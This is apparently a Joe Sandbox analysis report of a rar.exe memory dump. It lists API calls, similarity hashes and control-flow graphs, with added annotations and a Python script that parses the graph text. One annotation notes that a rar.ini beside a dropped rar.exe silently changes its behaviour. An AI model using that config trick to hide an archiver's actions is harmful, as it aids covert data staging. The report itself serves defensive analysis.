• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA647DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA64831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA64853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6FAA6495D,?,?,?,00007FF6FAA57E7D), ref: 00007FF6FAA648A6
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
• Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction ID: fecb0417baeee7dc7733a39b8c233f4f2a9a2bce7c8833df49e67ea4eb222fe8
• Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction Fuzzy Hash: D931D022728A8145EB60DB25E8002BA6361FF897D4F401271EE6D87BD9FF6CD14ACB00

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA543D1
• RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA54402
• RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA5440D
• GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA5443E
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: ca4801e8609480b4d5f209b227fb044d02645f31fd1b70e871a7a79d6e8d519c
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: 12117F22A18B4286EB909F26F5005A97361FF88BC4F445171EE6E87BD9EF3DD01AC704

Control-flow Graph
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID: H9
• API String ID: 0-2207570329
• Opcode ID: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
• Instruction ID: 7db19bb5408cd4db06d1899e062c8219018f035c593aa9f92cf56be554915848
• Opcode Fuzzy Hash: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
• Instruction Fuzzy Hash: A3E1CF62A08A9285EB11DF26E048BFD23E5EB4678CF454475DE1D837C5EF38E66AC700

Control-flow Graph
control_flow_graph 1858 7ff6faa42574-7ff6faa4259c 1859 7ff6faa4259e-7ff6faa425a0 1858->1859 1860 7ff6faa425a5-7ff6faa425a9 1858->1860 1861 7ff6faa4273a-7ff6faa42756 1859->1861 1862 7ff6faa425ab-7ff6faa425b6 GetStdHandle 1860->1862 1863 7ff6faa425ba-7ff6faa425c6 1860->1863 1862->1863 1864 7ff6faa42619-7ff6faa42637 WriteFile 1863->1864 1865 7ff6faa425c8-7ff6faa425cd 1863->1865 1868 7ff6faa4263b-7ff6faa4263e 1864->1868 1866 7ff6faa425cf-7ff6faa42609 WriteFile 1865->1866 1867 7ff6faa42644-7ff6faa42648 1865->1867 1866->1867 1871 7ff6faa4260b-7ff6faa42615 1866->1871 1869 7ff6faa4264e-7ff6faa42652 1867->1869 1870 7ff6faa42733-7ff6faa42737 1867->1870 1868->1867 1868->1870 1869->1870 1872 7ff6faa42658-7ff6faa42692 GetLastError call 7ff6faa43144 SetLastError 1869->1872 1870->1861 1871->1866 1873 7ff6faa42617 1871->1873 1878 7ff6faa426bc-7ff6faa426d0 call 7ff6faa3c95c 1872->1878 1879 7ff6faa42694-7ff6faa426a2 1872->1879 1873->1868 1885 7ff6faa42721-7ff6faa4272e call 7ff6faa3cf14 1878->1885 1886 7ff6faa426d2-7ff6faa426db 1878->1886 1879->1878 1880 7ff6faa426a4-7ff6faa426ab 1879->1880 1880->1878 1882 7ff6faa426ad-7ff6faa426b7 call 7ff6faa3cf34 1880->1882 1882->1878 1885->1870 1886->1863 1887 7ff6faa426e1-7ff6faa426e3 1886->1887 1887->1863 1889 7ff6faa426e9-7ff6faa4271c 1887->1889 1889->1863
(The line above is the flattened node/edge list of the rendered graph: basic blocks 0x7ff6faa42574-0x7ff6faa42756 that call GetStdHandle, WriteFile, GetLastError and SetLastError plus internal routines at 0x7ff6faa43144, 0x7ff6faa3c95c, 0x7ff6faa3cf14 and 0x7ff6faa3cf34. The executed/not-executed colouring of the graph is not preserved in the text.)
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ErrorFileLastWrite$Handle (the graph shows GetStdHandle, WriteFile, GetLastError and SetLastError)
• String ID:
• API String ID: 3350704910-0
• Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction ID: 77b7c104f0778c6e46c79abec2ef483c7d29c9d3d8ed14f8e5dda1f62ab0af4b
• Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
• Instruction Fuzzy Hash: 8C51C622A0864187EB24DF25E51437AB7A0FB48B84F540175EE6E87AE4EF3DE54FC600

Control-flow Graph
control_flow_graph 1894 7ff6faa41e80-7ff6faa41ebb call 7ff6faa7a5a0 1897 7ff6faa41ec8 1894->1897 1898 7ff6faa41ebd-7ff6faa41ec1 1894->1898 1900 7ff6faa41ecb-7ff6faa41f57 CreateFileW 1897->1900 1898->1897 1899 7ff6faa41ec3-7ff6faa41ec6 1898->1899 1899->1900 1901 7ff6faa41f59-7ff6faa41f76 GetLastError call 7ff6faa54534 1900->1901 1902 7ff6faa41fcd-7ff6faa41fd1 1900->1902 1912 7ff6faa41f78-7ff6faa41fb6 CreateFileW GetLastError 1901->1912 1913 7ff6faa41fba 1901->1913 1904 7ff6faa41ff7-7ff6faa4200f 1902->1904 1905 7ff6faa41fd3-7ff6faa41fd7 1902->1905 1907 7ff6faa42027-7ff6faa4204b call 7ff6faa7a610 1904->1907 1908 7ff6faa42011-7ff6faa42022 call 7ff6faa6a9e8 1904->1908 1905->1904 1906 7ff6faa41fd9-7ff6faa41ff1 SetFileTime 1905->1906 1906->1904 1908->1907 1912->1902 1915 7ff6faa41fb8 1912->1915 1916 7ff6faa41fbf-7ff6faa41fc1 1913->1916 1915->1916 1916->1902 1917 7ff6faa41fc3 1916->1917 1917->1902
(The line above is the flattened node/edge list of the rendered graph: basic blocks 0x7ff6faa41e80-0x7ff6faa4204b. Block 1900 calls CreateFileW; its GetLastError path (1901) leads to a second CreateFileW attempt in block 1912, and block 1906 calls SetFileTime. Internal routines are called at 0x7ff6faa7a5a0, 0x7ff6faa54534, 0x7ff6faa7a610 and 0x7ff6faa6a9e8. The executed/not-executed colouring is not preserved in the text.)
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: the same ten module dumps (00007FF6FAA20000 through 00007FF6FAACE000) as listed for the functions above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$Time (the graph shows CreateFileW, GetLastError and SetFileTime)
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
• Instruction ID: f2abd5f558c0dd06d9bce53c9988fa0f3e3dcc2bab249ef81c197445d21afee5
• Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
• Instruction Fuzzy Hash: AF413773A1868146FB618F24E5057AA6A90BB45BB8F100335EE7D836D8FF7DC44B8B40
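The two control_flow_graph lines above (the functions at 0x7ff6faa42574 and 0x7ff6faa41e80) are the text form of Joe Sandbox's rendered graph, and they are easier to reason about once turned back into blocks and edges. The following Python is an added example, not part of this report and not Joe Sandbox's own tooling: it parses that flattened form into basic blocks, per-block API names, internal call targets and edges, then answers reachability questions such as "which APIs can still run after this block". The token grammar it assumes (`<id> <start>[-<end>] [labels ...]`, `call <hex target>`, `<a>-><b>`) is inferred from the two lists on this page only, and the sample input is the second graph's text copied verbatim.

```python
"""Parse the flattened `control_flow_graph` text Joe Sandbox emits for a
function back into basic blocks, edges and per-block API calls."""
import re
from collections import deque

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")

# Input copied from the report's second graph (function at 0x7ff6faa41e80)
# so the parser can be checked offline against a real node list.
SAMPLE_CFG = (
    "control_flow_graph 1894 7ff6faa41e80-7ff6faa41ebb call 7ff6faa7a5a0 "
    "1897 7ff6faa41ec8 1894->1897 1898 7ff6faa41ebd-7ff6faa41ec1 1894->1898 "
    "1900 7ff6faa41ecb-7ff6faa41f57 CreateFileW 1897->1900 1898->1897 "
    "1899 7ff6faa41ec3-7ff6faa41ec6 1898->1899 1899->1900 "
    "1901 7ff6faa41f59-7ff6faa41f76 GetLastError call 7ff6faa54534 1900->1901 "
    "1902 7ff6faa41fcd-7ff6faa41fd1 1900->1902 "
    "1912 7ff6faa41f78-7ff6faa41fb6 CreateFileW GetLastError 1901->1912 "
    "1913 7ff6faa41fba 1901->1913 1904 7ff6faa41ff7-7ff6faa4200f 1902->1904 "
    "1905 7ff6faa41fd3-7ff6faa41fd7 1902->1905 "
    "1907 7ff6faa42027-7ff6faa4204b call 7ff6faa7a610 1904->1907 "
    "1908 7ff6faa42011-7ff6faa42022 call 7ff6faa6a9e8 1904->1908 1905->1904 "
    "1906 7ff6faa41fd9-7ff6faa41ff1 SetFileTime 1905->1906 1906->1904 1908->1907 "
    "1912->1902 1915 7ff6faa41fb8 1912->1915 1916 7ff6faa41fbf-7ff6faa41fc1 "
    "1913->1916 1915->1916 1916->1902 1917 7ff6faa41fc3 1916->1917 1917->1902"
)


def _is_addr(tok):
    """Address or address range. Must contain a hex letter or '-', so a bare
    decimal block id (e.g. '1897') is never mistaken for an address."""
    return bool(ADDR.match(tok)) and ("-" in tok or any(c.isalpha() for c in tok))


def parse_cfg(text):
    """Return ({block_id: {start, end, apis, calls}}, [(src, dst), ...]).
    Grammar assumed from the report text: a block is `<id> <start>[-<end>]`
    followed by labels; a label is an API name or `call <hex target>`;
    `<a>-><b>` tokens are edges."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and _is_addr(tokens[i + 1]):
            start, end = ADDR.match(tokens[i + 1]).groups()
            current = int(tok)
            blocks[current] = {"start": int(start, 16), "end": int(end or start, 16),
                               "apis": [], "calls": []}
            i += 2
        elif tok == "call" and current is not None and i + 1 < len(tokens):
            blocks[current]["calls"].append(int(tokens[i + 1], 16))
            i += 2
        else:
            if current is not None:  # a label before any block is dropped
                blocks[current]["apis"].append(tok)
            i += 1
    return blocks, edges


def apis_reachable_from_block(blocks, edges, block_id):
    """APIs that can still execute once control leaves `block_id`
    (breadth-first over successors; the block itself is excluded)."""
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    seen, queue, apis = set(), deque(succ.get(block_id, [])), set()
    while queue:
        b = queue.popleft()
        if b in seen:
            continue
        seen.add(b)
        apis.update(blocks[b]["apis"])
        queue.extend(succ.get(b, []))
    return apis


def summarize(text):
    """Entry block (lowest address), counts, blocks per API, call targets."""
    blocks, edges = parse_cfg(text)
    api_blocks = {}
    for bid, blk in blocks.items():
        for api in blk["apis"]:
            api_blocks.setdefault(api, []).append(bid)
    return {
        "entry": min(blocks, key=lambda b: blocks[b]["start"]),
        "block_count": len(blocks),
        "edge_count": len(edges),
        "api_blocks": {k: sorted(v) for k, v in api_blocks.items()},
        "internal_calls": sorted(hex(t) for blk in blocks.values() for t in blk["calls"]),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_CFG))
```

On the sample graph this reports 17 blocks and 25 edges with entry block 1894, CreateFileW in blocks 1900 and 1912, and shows that once SetFileTime (block 1906) has run no further API is reachable, which matches the retry-then-finish shape visible in the raw list. The same function accepts the first graph's line unchanged.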

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: the same ten module dumps (00007FF6FAA20000 through 00007FF6FAACE000) as listed for the functions above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: rar.ini$switches=$switches_%ls=
(rar.ini is RAR's optional configuration file: per the RAR documentation a `switches=` line supplies default switches for every command and `switches_<command>=` supplies defaults for one command, so the `%ls` in the format string is filled by swprintf, presumably with the command being run. A rar.ini placed beside a dropped rar.exe would therefore change its behaviour without any visible command-line switches.)
• API String ID: 233258989-2235180025
• Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
• Instruction ID: 0d8f49573899d37e6796cbf07233e01b243c9e0cfc37ce8d3223156480ec0639
• Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
• Instruction Fuzzy Hash: E041A022A1868281FB50EF25D8111BA23A0FF557A4F401175EABD877D9FF3DD55AC700

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: the same ten module dumps (00007FF6FAA20000 through 00007FF6FAACE000) as listed for the functions above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
• String ID: rar.lng
(The API ID is built from name fragments of the APIs the function calls; this set is consistent with GetProcAddress, GetModuleHandle, setbuf, GetLastError, LoadLibrary, SetErrorMode and GetVersion. Together with the rar.lng string this is consistent with the routine that loads RAR's language/resource module from the executable's directory at start-up.)
• API String ID: 553376247-2410228151
• Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
• Instruction ID: 2d87953339ba604c747c3d9355b3c574f6609c23533343bf9b67478eeaf825e8
• Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
• Instruction Fuzzy Hash: 7341BF21E0C7824AFB10EB64A4121B923A09F42794F5855B5E97EC73D7FE2EE40F8710
Control-flow Graph
APIs
• SHGetMalloc.SHELL32(?,00000800,?,00007FF6FAA54432,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA540C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA540DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF6FAA540F1
  • Part of subcall function 00007FF6FAA43458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6FAA5413F,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA434A0
  • Part of subcall function 00007FF6FAA43458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6FAA5413F,?,?,?,?,00000800,00000000,00000000,00007FF6FAA538CB,?,?,?,00007FF6FAA541EC), ref: 00007FF6FAA434D5
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
• Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction ID: 178536be2d98375e40d85bb305ea9cffdf48b940604681a889333ae6d5ccdff1
• Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction Fuzzy Hash: AE21C022A08B4281EB509F26F9501BA6361BF89BD0F085071EF2E873D9FE3DD04A8700
APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA897A5
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA89807
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA89841
• FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6FAA83CEF,?,?,00000000,00007FF6FAA83CAA,?,?,00000000,00007FF6FAA83FD9), ref: 00007FF6FAA8986B
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 1557788787-0
• Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction ID: 5e7cfa51f1555e40d9dc060ecc4e8f56b1e9a21e79c6a7617be4257b5891a8de
• Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction Fuzzy Hash: E8213035E1C79281E7208F12A440129A7A4FB58FD1F484175DEAEA7BD8EF3CE4578744
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction ID: 0eda8f488714bbdb4d4190bffceb1263b75e49e34eaafa851b7043f14e72b2e7
• Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction Fuzzy Hash: C021A521E0CA4681EBA28B25E50033962A4BF45BD8F1445B2FD7DC76E8EF2DD49A8741
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: 8cc372337e0ab4260059d2635775570b8060c952cdb9856d072f381ed791ff4e
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: 9C81B321E0C78242EB719F1191122B922A0BF55786F4480B1DEEDC76C6FF2EA49FC710
APIs
Strings
Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                • Instruction ID: ad1aa5d3ca38706997fd1715faa7c3908fb70ffb3e220eee16d670a26dbd1a5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2216422E1C7C241FB688B259490139A755FB45774F282375DA7E867D4EE3DE886C301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
